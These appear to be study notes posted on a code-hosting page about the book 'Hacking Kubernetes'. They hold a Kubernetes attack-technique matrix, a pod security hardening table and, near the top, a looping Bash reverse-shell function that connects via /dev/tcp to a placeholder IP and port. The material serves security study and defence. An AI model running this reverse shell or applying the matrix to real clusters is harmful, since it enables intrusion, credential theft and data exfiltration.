keyolk
commented
3 years ago - Introduction
- Pod-Level Resources
- Container Runtime Isolation
- Applications And Supply Chain
- Networking
- Storage
- Hard Multitenancy
- Policy
- Intrusion Detection
- Organizations
Open keyolk opened 3 years ago
keyolk
commented
3 years ago keyolk
commented
3 years ago 
Bash Revers Shell Example
revshell() {
local TARGET_IP="${1:-123.123.123.123}";
local TARGET_PORT="${2:-1234}";
while :; do
nohup bash -i &> /dev/tcp/${TARGET_IP}/${TARGET_PORT} 0>&1;
sleep 1;
done
}
| Initial Access (Popping a shell pt 1 - prep) | Execution (Popping a shell pt 2 - exec) | Persistence (Keeping the shell) | Privilege Escalation (Container breakout) | Defense Evasion (Assuming no IDS) | Credential Access (Juicy creds) | Discovery (Enumerate possible pivots) | Lateral Movement (Pivot) | Command & Control (C2 methods) | Impact (Dangers) |
|---|---|---|---|---|---|---|---|---|---|
| Using Cloud Credentials - service account keys, impersonation | Exec Into Container (bypass admission control policy) | Backdoor Container (add a reverse shell to local or container registry image) | Privileged container (legitimate escalation to host) | Clear Container Logs (covering tracks after host breakout) | List K8s Secrets | List K8s API Server (nmap, curl) | Access Cloud Resources (workload identity and cloud integrations) | Dynamic Resolution (DNS tunnelling) | Data Destruction (datastores, files, NAS, ransomware…) |
| Compromised Images In Registry (supply chain unpatched or malicious) | BASH/CMD Inside Container (Implant or trojan, RCE/reverse shell, malware, C2, DNS tunnelling) | Writable Host Path Mount (host mount breakout) | Cluster Admin Role Binding (untested RBAC) | Delete K8s Events (covering tracks after host breakout) | Mount Service Principal (Azure specific) | Access Kubelet API | Container Service Account (API server) | App Protocols (L7 protocols, TLS, …) | Resource Hijacking (cryptojacking, malware c2/distribution, open relays, botnet membership) |
| Application Vulnerability (supply chain unpatched or malicious) | Start New Container (with malicious payload: persistence, enumeration, observation, escalation) | K8s CronJob (reverse shell on a timer) | Access Cloud Resources (metadata attack via workload identity) | Connect From Proxy Server (to cover source IP, external to cluster) | Applications Credentials In Config Files (key material) | Access K8s Dashboard (UI requires service account credentials) | Cluster Internal Networking (attack neighbouring pods or systems) | Botnet (k3d, or traditional) | Application DoS |
| KubeConfig File (exfiltrated, or uploaded to the wrong place) | Application Exploit (RCE) | Static Pods (reverse shell, shadow API server to read audit-log-only headers) | Pod hostPath Mount (logs to container breakout) | Pod/Container Name Similarity (visual evasion, cronjob attack) | Access Container Service Account (RBAC lateral jumps) | Network Mapping (nmap, curl) | Access Container Service Account (RBAC lateral jumps) | Node Scheduling DoS | |
| Compromise User Endpoint (2FA and federating auth mitigate) | SSH Server Inside Container (bad practice) | Injected Sidecar Containers (malicious mutating webhook) | Node To Cluster Escalation (stolen credentials, node label rebinding attack) | Dynamic Resolution (DNS) (DNS tunnelling/exfiltration) | Compromise Admission Controllers | Instance Metadata API (workload identity) | Host Writable Volume Mounts | Service Discovery DoS | |
| K8s API Server Vulnerability (needs CVE and unpatched API server) | Container Life Cycle Hooks (postStart and preStop events in pod yaml) | Rewrite Container Life Cycle Hooks (postStart and preStop events in pod yaml) | Control Plane To Cloud Escalation (keys in secrets, cloud or control plane credentials) | Shadow admission control or API server | Compromise K8s Operator (sensitive RBAC) | Access K8s Dashboard | PII or IP exfiltration (cluster or cloud datastores, local accounts) | ||
| Compromised host (credentials leak/stuffing, unpatched services, supply chain compromise) | Rewrite Liveness Probes (exec into and reverse shell in container) | Compromise Admission Controller (reconfigure and bypass to allow blocked image with flag) | Access Host File System (host mounts) | Access Tiller Endpoint (Helm v3 negates this) | Container pull rate limit DoS (container registry) | ||||
| Compromised etcd (missing auth) | Shadow admission control or API server (privileged RBAC, reverse shell) | Compromise K8s Operator (compromise flux and read any secrets) | Access K8s Operator | SOC/SIEM DoS (event/audit/log rate limit) | |||||
| K3d botnet (secondary cluster running on compromised nodes) | Container breakout (kernel or runtime vulnerability e.g. Dirtycow, /proc/self/exe, eBPF verifier bugs, Netfilter) |
CAP_DAC_OVERRIDE, CAP_CHOWN, CAP_DAC_READ_SEARCH, CAP_FORMER, CAP_SETFCAP: bypass filesystem permissions
Validating Security Context: https://kubesec.io/
| Field Name(s) | Usage | Recommendations |
|---|---|---|
| privileged | Controls whether Pods can run privileged containers | Set to false |
| hostPID, hostIPC | Controls whether containers can share host process namespaces | Set to false |
| hostNetwork | Controls whether containers can use the host network | Set to false |
| allowedHostPaths | Limits containers to specific paths of the host file system | Use a “dummy” path name (such as /foo marked as read-only). Omitting this field results in no admission restrictions being placed on containers |
| readOnlyRootFilesystem | Requires the use of a read only root file system | Set to true when possible |
| runAsUser, runAsGroup, supplementalGroups, fsGroup | Controls whether container applications can run with root privileges or with root group membership | Set runAsUser to MustRunAsNonRootSet runAsGroup to non-zero (see the example in Appendix C: Example Pod Security Policy)Set supplementalGroups to non-zero (see example in Appendix C)Set fsGroup to non-zero (see example in Appendix C: Example Pod Security Policy) |
| allowPrivilegeEscalation | Restricts escalation to root privileges | Set to false. This measure is required to effectively enforce “runAsUser: MustRunAsNonRoot” settings |
| seLinux | Sets the SELinux context of the container | If the environment supports SELinux, consider adding SELinux labeling to further harden the container |
| AppArmor annotations | Sets the AppArmor profile used by containers | Where possible, harden containerized applications by employing AppArmor to constrain exploitation |
| seccomp annotations | Sets the seccomp profile used to sandbox containers | Where possible, use a seccomp auditing profile to identify required syscalls for running applications; then enable a seccomp profile to block all other syscalls |
https://learning.oreilly.com/library/view/hacking-kubernetes/9781492081722/